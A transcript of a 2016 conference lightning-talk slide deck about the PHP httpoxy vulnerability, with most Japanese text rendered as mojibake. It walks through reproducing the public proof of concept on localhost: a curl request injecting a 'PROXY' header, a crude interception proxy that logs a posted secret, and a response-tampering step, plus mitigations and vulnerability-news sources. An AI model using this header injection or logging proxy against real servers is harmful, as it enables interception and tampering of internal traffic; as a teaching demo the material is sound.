初心者むけhttpoxyとか脆弱性とかの話 at #PHPBLT 5

Transcript

1. PHPBLT#5 Httpoxyͱ͔ͷ࿩ 20160720 uzulla

2. ࣗݾ঺հ • Junichi Ishida aka uzulla • ͠ΐ΅͍ϑϦʔλʔʢϥϯεʣͰ͢ • HachiojiͳΜͨΒͱ͔

   • ͳΜͨΒHacjioji in ඼઒ͱ͔

3. Httpoxy • https:/ /httpoxy.org/ • ࡉ޻ͨ͠ϦΫΤετΛૹΔ͜ͱͰɺPHP͔Β֎෦΁ͷϦΫΤε τʹ͓͍ͯhttpϓϩΩγΛࢦఆͰ͖ΔՄೳੑ • ΞϓϦ͔Βଞͷαʔόʔ΁ͷhttp௨৴Λ౪ௌͰ͖ΔՄೳੑ •

   ͋Δ͍͸ɺվ͟Μ΋Ͱ͖ΔՄೳੑ • ΈΜͳௐࠪࡁΈͩΑͶʂʁ • ʢΈΜͳ஌͍ͬͯͨΒ਺ϖʔδඈ͹͢ʣ
4. None

5. • ʮCLIͰΑ͋͘Δ࢓༷ʯͱʮCGIͷ࢓༷ʯͷিಥ͕ݪҼ • HTTP_PROXY؀ڥม਺ͰϓϩΩγΛઃఆͰ͖ΔCLIͷϓϩάϥϜ ͕Α͋͘Δ • ΢ΣϒΞϓϦʹ͸ʢ΄΅ʣແ༻͕ͩɺී௨ͷਓʢʁʣ͸PHPͰ CLIϓϩάϥϜΛॻ͘ͷͰɺҰ෦ͷϥΠϒϥϦ͕αϙʔτͨ͠ɻ • ͯ͞ɺCGIͷ࢓༷Ͱ͸ʢྫ͑͹ʣHOGEͱ͍͏ϦΫΤετϔομ

   ʔΛHTTP_HOGE؀ڥม਺ʹอଘ͢Δͷ͕ͩ…ɻ • ݁ՌɺʮPROXYʯϔομ͕དྷΔͱHTTP_PROXYͱ͍͏؀ڥม਺͕ ઃఆ͞ΕɺϦΫΤετϔομ͔ΒϓϩΩγ͕ઃఆͰ͖Δʢʂʣ

6. • CGIϦεϖΫτͳPHP͸mod_php΍fastcgi΋͜ͷ࢓༷ • ͳ͓ɺPHPࣗମ͸௚઀͜ͷ੬ऑੑ͸Өڹ͠ͳ͍ • օେ޷͖file_get_contents͸Өڹͳ͍ • ͕Μ͹ͬͯ࡞Γ͜·ͳ͚Ε͹Өڹ͠ͳ͍ʼ͡Ό͋ͳΜͰʁ • HTTP_PROXYΛड͚ೖΕΔ୅දతͳϥΠϒϥϦͱͯ͠guzzle

   • 6.2.1Ͱमਖ਼ • guzzle͸࠷ۙ͋ΒΏΔॴͰґଘϥΠϒϥϦͱͯ͠࢖ΘΕ͍ͯ ΔɺͳͷͰ࿩୊ʹͳͬͨͷͰͨ͠ʂ

7. ͳ͓… • ઃఆͰ͖Δͷ͸HTTP_PROXY؀ڥม਺Ͱ͋ͬͯɺHTTPS_PROXY؀ ڥม਺͸ࢦఆͰ͖ͳ͍ • τϦοΫ্ɺHTTP_*͔͠ઃఆͰ͖ͳ͍ͷͰ • ͭ·Γɺ৐ͬऔΕΔͷ͸HTTP • ʢৗࣝతͳϥΠϒϥϦͳΒͶʂʣ

   • େ఍ͷϠόΠ৘ใ͸HTTPSͩΖ͏…ଟ෼…ɻ

8. ΦνͱͳΔରࡦ͸ • !΢Σϒαʔό౳ͰɺPHPͷࣄલʹϔομʔΛམͱ͢ • !getenv('HTTP_PROXY')ͳͲͱ͍ͬͨίʔυΛແ͘͢ • ίʔυΛ௚͢ • ϥΠϒϥϦͷόʔδϣϯΞοϓ •

   ❌ʮίʔυઌ಄ͱ͔Ͱ؀ڥม਺্ॻ͖͢Ε͹͍͍ͷͰ͸ʁʯ ʮ࢒೦ͳΒແཧͳͷͰ͢ʯ

9. ͜͜·Ͱ͸օ͞Μ͝ଘ͡ • ʢ͖ͬͱ͜͜·Ͱશ෦ͷεϥΠυ͕εΩοϓʣ • ͱ͜ΖͰΈͳ͞Μɺීஈ͔Β੬ऑੑͷରԠͯ͠·͔͢ʁ • ʮࣗ෼Ͱʯௐࠪ΍ରԠͯ͠·͔͢ʁ • ʮࣗ෼Ͱʯීஈ͔Β৘ใऩूͯ͠·͔͢ʁ •

   ʢͳ͓ϑϦʔλʔ͸ݽಠͳͷͰ౰વηϧϑαʔϏε…ʣ

10. ࢼͯ͠·͔͢ʁ • ࢼ͞ͳ͍ͰɺରԠࡦΛͱʹ͔͘ίϐϖͨ͠Γͯ͠·ͤΜ͔ʁ • ੬ऑੑ͸ࢼ͞ͳ͍ͱצҧ͍͢Δࣄ͕͋Δ • ௨ৗࣗ෼Ͱ࣮૷͢Δඞཁ͕͋Δ͕ɺPoC͕ެ։͞Ε͍ͯΔ͜ͱ ΋ଟ͍ • Proof

    of conceptʢ֓೦࣮ূɺ࣮ূσϞʣ • ੬ऑੑΛ࠶ݱͤ͞ΔσϞίʔυ • ʢ࠷ۙࢮޠɿexploit codeʣ

11. ࢼͦ͏ʂ • ࢼ͍ͯ͠Δਓ͕ଟ͔ͬͨΒεΩοϓʂ

12. • PoC͸Ͳ͜ʹ͋Δ͔ʁ • CVE౳ʹඞͣهࡌ͞Ε͍ͯΔΘ͚Ͱ͸ͳ͍ɺͷͰ୳͢ • ʮ࣏͕҆ѱ͘ͳΔ͔Βެ։͢Δͳʂʯͱ͍͏ਓ΋͍ΔͷͰ… • ͳ͓ɺΑ͘Θ͔ΒΜPoCʢ΍Exploitʣ͸ઈରʹ࣮ߦ͢Δͳʂʂʂ • CVEͱ͔ʹ৐ͬͯΔౕ͸େৎ෉ͩΖ͏͕ɺ໺ྑͷExploit͸ഁ

    յతͩͬͨΓɺόοΫυΞͩͬͨΓ͢Δ • ࠓճ͸httpoxy͕ެ։͍ͯͨ͠ • https:/ /github.com/httpoxy/php-fpm-httpoxy-poc

13. // ݩͷίʔυ͸͜ͷΑ͏ͳײ͡ // "guzzlehttp/guzzle": "~6.0" $client = new GuzzleHttp\Client(); $client->request(

    'POST', 'http://my-internal-microservice.example.com/', ['secret' => 'some-really-secret-string'] ); echo "Request sent\n";

14. // ͦͷ··Ͱ͸࢖͑ͳ͍ͷͰɺίʔυमਖ਼ // http://127.0.0.1:8002/api.phpʹػີσʔλ()ΛPOSTͯ͠ɺ // ؼ͖ͬͯͨσʔλΛecho͍ͯ͠Δ require 'vendor/autoload.php'; $client =

    new GuzzleHttp\Client(); $res = $client->request( 'POST', 'http://127.0.0.1:8002/api.php?himi=tsu', ['form_params' => ['secret' => 'I_AM_PHPER']] ); echo $res->getBody();

15. API(?!)Λ࡞੒ <?php // api.php echo "BLT!BLT!";

16. ΞϓϦͱAPI(?!)Λىಈ $ composer install $ php -S 127.0.0.1:8001 index.php #

    ผγΣϧͰ $ php -S 127.0.0.1:8002 api.php

17. ͨΊͯ͠ΈΔ $ curl 'http://localhost:8001/' BLT!BLT! • API͔ΒͷσʔλΛͱ͖ͬͯͯΔͷͰOK

18. ѱҙ͋ΔProxyΛ༻ҙ͢Δ • ͝ՈఉʹProxy͕͋Δํ͸ෆཁ • Charlesͱ͔ • (༨ஊɿcharlesݹ͍͠ɺ࠷ۙ͸ͳʹ͕ϋϠϦͳͷʁ)

19. ѱҙ()͋ΔࡶͳproxyΛॻ͘ <?php $uri = $_SERVER['REQUEST_URI']; $body = file_get_contents('php://input'); $method =

    $_SERVER['REQUEST_METHOD']; error_log($body); error_log(print_r($_SERVER,1)); require 'vendor/autoload.php'; $client = new GuzzleHttp\Client(); $res = $client->request($method, $uri, ['body' => $body]); echo $res->getBody();

20. ࡶͳProxyʹ͍ͭͯ • ੒ޭ͢ΔͱɺΫΤϦͳͲΛerror_logʹग़ྗ͢Δ • ద౰ʹproxyઌ͔Βऔಘ͖ͯͯ͠Ϩεϙϯε͢Δ ʢproxy͔ͩΒͶ…ʣ • ͜ͷίʔυ͸ࡶͰةݥͳͷͰ࣮ݧҎ֎ʹ͸ઈରʹ࢖͏ͳΑʂ • ʮContent-type?ͳʹͦΕ͏·͍ͷʁʯ

21. ࡶͳproxy্ཱͪ͛ $ php -S 127.0.0.1:8003 proxy.php

22. ࣮ࡍʹ੬ऑੑΛςετͩʂ $ curl 'http://localhost:8001/' -H 'PROXY: http://127.0.0.1:8003/' BLT!BLT!

23. • ʮ࢒೦͜ΕͰ͸͏͖͝·ͤΜʯ • ͳΜͱbuiltin server ͸੬ऑੑ͕ͳ͍ʂ͆ • ͱ͍͏͜ͱͰɺ੿࡞apachehereΛ͔ͭ͏(໪࿦ͳΜͰ΋͍͍͚Ͳ) • https:/

    /github.com/uzulla/apachehere $ apachehere -p 8001 DocumentRoot : /xxx php-cgi open : http://127.0.0.1:8001/ <snip> [20/Jul/2016:01:49:18 +0900] 127.0.0.1 [200]: /index.php

24. ϦτϥΠʂ $ curl 'http://localhost:8001/' -H 'PROXY: http://127.0.0.1:8003/' BLT!BLT!

25. ੒ޭ͢Δͱproxyͷϩάʹ… [Wed Jul 20 02:01:43 2016] secret=I_AM_PHPER [Wed Jul 20

    02:01:43 2016] Array ( [DOCUMENT_ROOT] => /Users/zishida/Dropbox/talk/20160719PHPBLT5/php-fpm-httpoxy-poc [REMOTE_ADDR] => 127.0.0.1 [REMOTE_PORT] => 53696 [SERVER_SOFTWARE] => PHP 7.0.3 Development Server [SERVER_PROTOCOL] => HTTP/1.1 [SERVER_NAME] => 127.0.0.1 [SERVER_PORT] => 8003 [REQUEST_URI] => http://127.0.0.1:8002/api.php?himi=tsu [REQUEST_METHOD] => POST [SCRIPT_NAME] => /api.php [SCRIPT_FILENAME] => /Users/zishida/Dropbox/talk/20160719PHPBLT5/php-fpm-httpoxy-poc/api.php [PHP_SELF] => /api.php [QUERY_STRING] => himi=tsu [HTTP_HOST] => 127.0.0.1:8002 [HTTP_PROXY_CONNECTION] => Keep-Alive [HTTP_USER_AGENT] => GuzzleHttp/6.2.0 curl/7.43.0 PHP/7.0.3 [CONTENT_TYPE] => application/x-www-form-urlencoded [HTTP_CONTENT_TYPE] => application/x-www-form-urlencoded [CONTENT_LENGTH] => 17 [HTTP_CONTENT_LENGTH] => 17 [REQUEST_TIME_FLOAT] => 1468947703.6871 [REQUEST_TIME] => 1468947703 )

26. [Wed Jul 20 02:01:43 2016] secret=I_AM_PHPER [Wed Jul 20 02:01:43

    2016] Array ( snip [REQUEST_URI] => http://127.0.0.1:8002/api.php?himi=tsu • ͜ͷΑ͏ʹɺproxy.phpͷϩάʹͰͯ͘ΔΘ͚Ͱ͢Ͷɻ

27. proxyΛमਖ਼͢Ε͹… // proxy.php //echo $res->getBody(); echo "ീԦࢠʂീԦࢠʂ"; • ͱमਖ਼ͯ͠ $

    curl 'http://localhost:8001/' -H 'PROXY: http://127.0.0.1:8003/' ീԦࢠʂീԦࢠʂ • վ͟Μ੒ޭͰ͢Ͷʂ

28. ͱ͍͏͜ͱͰɺ • ҆શͷͨΊʹbuiltin serverΛ͔͓ͭ͏ʢҧ͏ʣ • ͱʹ͔͘PoCΛಈ͔ͨ͠Γ࡞ͬͯΈΔͷ͸ॏཁɺษڧʹͳΔ • ʮapachehere͕ศརμφʔɺDockerʁVagrantʁ͠ΒΜʂʯ • ʮ͑ͬɺPHPͷόʔδϣϯ͕ݹ͍ʁ͢·Μʂʯ

29. ͋ͱɺ৻ॏʹͶʂ • ύονόʔδϣϯΛ؁͘Έͯ͸͍͚ͳ͍ • ʮGuzzleͷ্͛ͨΒɺGAEͰ͏͔͝ͳ͘ͳͬͨʢ࣮࿩ʯ exception: php_sapi_name() has been disabled

    for security reasons. It can be re-enabled by adding it to the google_app_engine.enable_functions ini variable in your applications php.ini • ʮGAE ͕ѱ͍ ͷ࢓༷Ͱ͸ʁʯʮ͔ͨ͠ʹʯ

30. Ͱ͸υίͰ஌Δ͔ʁ • օ͞Μ͸Ͳ͜Ͱ஌ͬͯ·͔͢ʁ

31. ໰୊Λ΢Υον͠ଓ͚Δ • ໘౗͕ͩ࢓ࣄͩʂ • TwitterͳͲSNSͰ஌Δ • CVEͳͲΛߪಡ͢Δ • χϡʔεαΠτΛߪಡ͢Δ •

    ެࣜϦϦʔεΛߪಡ͢Δ

32. TwitterͳͲSNS • ଎ใੑ͕ߴ͍ɺ5ׂ͘Β͍͸͜͜ͰଘࡏΛ஌ΔࣄʹͳΔ • ʢPHPͷਓͰ͸ͳ͆͘ʣJSɺGoɺPerl΍Πϯϑϥํ໘ͳͲͷਓΛ ϑΥϩʔ͢Δͱྑ͍ʢݸਓతͳओ؍ʣ • ৄ͍͠ਓ͸౰વ࿩୊ʹ͢Δ͜ͱ͕ଟ͍͠ɺ ʢΘ͔͍ͬͯΔͷͰʣҰ࣍৘ใʹϦϯΫ͍ͯ͠Δ͜ͱ͕ଟ͍

33. ηΩϡϦςΟʹಛԽͨ͠χϡʔεαΠτ • http:/ /jvn.jp/report/ • JVNɺ೔ຊޠɺ·ͣ͸͚ͩ͜͜Ͱ΋ྑ͍ʢͱࢥ͏ʣ • Feed΋͋ΔΑ • https:/

    /www.jpcert.or.jp/ • JPCERTɺϝϧϚΨ΋͋ΔΑʂ

34. • https:/ /nvd.nist.gov/download.cfm • NISTɺӳޠɺCVEͷFeed͕͋ΔͷͰศར • CVE͸΄΅Ұ࣍৘ใͱͯ͠ѻͬͯྑ͍ʢͱࢥ͏ʣ • https:/ /security.sensiolabs.org/database

    • PHPϥΠϒϥϦͷ৘ใɺFeed͕͋ΔͷͰศར

35. ҰൠతͳχϡʔεαΠτ౳ • ҰൠతͳITܥχϡʔεαΠτ͸…ຊจ͸ಡ·ͣʹ͙͢ʹϦϯΫઌ ͷҰ࣍৘ใ΁ݴͬͨํ͕ྑ͍…ɻ

36. • reddit֤छɺ଎ใੑߴ͍͕ίϝϯτ͸͙͢ʹ৴༻͠ͳ͍Α͏ʹ • https:/ /www.reddit.com/r/netsec • https:/ /www.reddit.com/r/sysadmin • https:/

    /www.reddit.com/r/PHP • hackernewsɺ଎͍Μ͚ͩͲ͙͢ʹྲྀΕ͍ͯ͘ • https:/ /news.ycombinator.com/news

37. ެࣜαΠτ • ಛʹࡉ͔͔͔͘ͳ͍Ͱ͚͢Ͳ • ࣗ෼͕͔͍ͭͬͯΔϑϨʔϜϫʔΫ΍ϥΠϒϥϦ΍PHPͷϦϦ ʔεͱ͔͸Έͯ΋ྑ͍ͷͰ͸ʁʁ

38. blog • ࣄྫΛ·ͱΊͯΒͬ͠ΌΔαΠτͱ͔ • ηΩϡϦςΟاۀͷϒϩά΋Α͍ • ౰વ͚ͩͲɺ໢ཏੑ͕ͳ͍ • ʮ୯ޠʯΛ஌ͬͯɺ୳͔ͯ͠ΒͨͲΓண͘ͷͰ΋Α͍ •

    झຯ͕ͰΔͷͰলུ

39. Branded Vulnerability ͳαΠτ • ࠷ۙ͸Ωϟονʔͳ໊લ͕෇͘ɺHttpoxy΋ͦ͏ • GHOST,FREAK,POODLE౳ʑ • ·ͱΊαΠτΈ͍ͨͳ΋ͷɺγΣΞ͠΍͘͢ΩϟονʔͳΞΠ ίϯ͕͋ͬͨΓͯ͠Α͍

    • ଟ͘ͷ৔߹CVEΑΓ͸Θ͔Γ΍͍͢͠ɺͱΓ͔͋͑ͣ͜͜ΒΑΜ Ͱ΋OK͕ͩɺӳޠͰ͢ɻ • ʮ͜Ε͕͋Δ͔Βॏେʂʯͱ͍͏༁Ͱ͸ͳ͍ɺٯ΋·͔ͨ͠Γ

40. ৘ใΩϟον·ͱΊ • ΢Υονʹ͸RSSͱϝϧϚΨ͕ศརʂSNS͚ͩͩͱ࿙ΕΔʂʢओ ؍Ͱ͕͢ɺΈΜͳ͕PHPͷ͜ͱΛؾʹͯ͠ΔΘ͚Ͱ͸ͳ͍͆ʣ • JPCERTͱJVN͘Β͍͸ొ࿥ͯ͠Α͍ͷͰ͸ • Branded VulnerabilityͳαΠτ͕͋Ε͹·ͣνΣοΫ •

    ӳޠ͕ॏཁʢʣ • ࿨༁΍ղઆهࣄ͸Ұ൩ೋ൩͘Β͍ͰདྷΔͷͰɺΑ͘Θ͔Βͳ͚ Ε͹߄ͯͣʹਖ਼࠲ͯ͠଴ͭ͜ͱ

41. That's all folks! • ੬ऑੑ͸ࣗ෼Ͱ΋ͨΊͦ͏ʂ • χϡʔεΛͪΌΜͱݟΑ͏ʂ • ͪΌΜͱ੬ऑੑΛ೺Ѳͯ͜͠ʂ •

    Httpoxyɺ͋Μ·Γ೿खͳ੬ऑੑ͡Όͳͯ͘Α͔ͬͨʂ // enjoy ! $ grep -r HTTP_PROXY /your/codes/